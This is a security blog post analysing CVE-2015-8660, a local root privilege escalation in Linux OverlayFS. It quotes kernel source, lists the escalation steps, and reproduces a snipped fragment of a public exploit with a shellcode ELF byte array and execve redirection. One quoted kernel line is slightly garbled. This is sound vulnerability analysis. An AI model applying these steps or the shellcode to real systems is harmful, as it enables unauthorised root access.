本サイトは、快適にご利用いただくためにクッキー(Cookie)を使用しております。
Cookieの使用に同意いただける場合は「同意する」ボタンを押してください。
なお本サイトのCookie使用については、「個人情報保護方針」をご覧ください。

最新情報

2016.01.22

Digging into OverlayFS

著者:Alice

 OverlayFS is a union filesystem for Linux implemented on top of other filesystems. It's often used in conjunction with lightweight virtualization technologies like LXC and Docker. I dug a little bit into the implementation of OverlayFS to understand CVE-2015-8660.


 If you're not familiar with OverlayFS, you should read the kernel documentation for OverlayFS [1].


 In a nutshell, CVE-2015-8660 is a vulnerability that leads to local privilege escalation due to the lack of permission checks that should be done in OverlayFS when a user attempts to change the attribute of a file on the underlying filesystems. Now, let’s dive into the kernel source.


 When a user chmod a file on an OverlayFS, ovl_setattr() is called.


fs/overlayfs/inode.c:

int ovl_setattr(struct dentry *dentry, struct iattr *attr)
{
	int err;
	struct dentry *upperdentry;

	err = ovl_want_write(dentry);
	if (err)
		goto out;

	upperdentry = ovl_dentry_upper(dentry);
	if (upperdentry) {
		mutex_lock(&upperdentry->d_inode->i_mutex);
		err = notify_change(upperdentry, attr, NULL);
		mutex_unlock(&upperdentry->d_inode->i_mutex);
	} else {
		err = ovl_copy_up_last(dentry, attr, false);
	}
	ovl_drop_write(dentry);
out:
	return err;
}

 If the file resides in the lower filesystem, ovl_copy_up_last() is called, which calls ovl_copy_up_one() after it copied up the lower dentry via ovl_copy_up().


fs/overlayfs/inode.c:

static int ovl_copy_up_last(struct dentry *dentry, struct iattr *attr,
			    bool no_data)
{
	int err;
	struct dentry *parent;
	struct kstat stat;
	struct path lowerpath;

	parent = dget_parent(dentry);
	err = ovl_copy_up(parent);
	if (err)
		goto out_dput_parent;

	ovl_path_lower(dentry, &lowerpath);
	err = vfs_getattr(&lowerpath, &stat);
	if (err)
		goto out_dput_parent;

	if (no_data)
		stat.size = 0;

	err = ovl_copy_up_one(parent, dentry, &lowerpath, &stat, attr);

out_dput_parent:
	dput(parent);
	return err;
}

 Finally, capabilities are raised in ovl_copy_up_one() before it changes attributes of upper dentry, so the chmod always succeeds regardless of the original credentials.


fs/overlayfs/copy_up.c:

	cap_raise(override_cred->cap_effective, CAP_SYS_ADMIN);
	cap_raise(override_cred->cap_effective, CAP_DAC_OVERRIDE);
	cap_raise(override_cred->cap_effective, CAP_FOWNER);
	cap_raise(override_cred->cap_effective, CAP_FSETID);
	cap_raise(override_cred->cap_effective, CAP_CHOWN);
	cap_raise(override_cred->cap_effective, CAP_MKNOD);
	old_cred = override_creds(override_cred);

	err = -EIO;
	if (lock_rename(workdir, upperdir) != NULL) {
		pr_err("overlayfs: failed to lock workdir+upperdir\n"); 
");
		goto out_unlock;
	}
	upperdentry = ovl_dentry_upper(dentry);
	if (upperdentry) {
		unlock_rename(workdir, upperdir);
		err = 0;
		/* Raced with another copy-up?  Do the setattr here */
		if (attr) {
			mutex_lock(&upperdentry->d_inode->i_mutex);
			err = notify_change(upperdentry, attr, NULL);
			mutex_unlock(&upperdentry->d_inode->i_mutex);
		}
		goto out_put_cred;
	}

 A user can escalate the privilege to root by performing the following steps: create a new user and mount namespace, mount a directory such as /bin as a lower filesystem of an OverlayFS, setuid an executable file in the directory owned by root through the OverlayFS, and execute the file.


 The exploit by halfdog [2] employs a really interesting technique that leverages error messages in the loader to overwrite a setuided file with "shellcode" by redirecting the messages to the file without dropping the setuid permission as below.


UserNamespaceOverlayfsSetuidWriteExec.c:

  char suidExecMinimalElf[] = {
      0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
      0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
      0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
      0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
      0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
      0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
      0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
      0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80,

      0x31, 0xc0, 0x04, 0xd0, 0xcd, 0x80,

      0x31, 0xc0, 0x89, 0xd0,
      0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
  };
  char *helperArgs[]={"/bin/mount", NULL};

...(snip)...

      dup2(destFd, 1);
      dup2(destFd, 2);
      helperArgs[0]=suidWriteNext;
      execve(helperSuidPath, helperArgs, NULL);

 As a side note, CVE-2015-8660 is also a namespace issue. Namespaces complicate the security in the kernel, especially the user namespace. Anyway, I love the kernel.



References:

[1] Overlay Filesystem - The Linux Kernel Archives

https://www.kernel.org/doc/Documentation/filesystems/overlayfs.txt

[2] Linux User Namespace Overlayfs Local Root Privilege Escalation

http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/

[3] CVE-2015-8660 at MITRE

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-8660

Special Cyber Service Team
Alice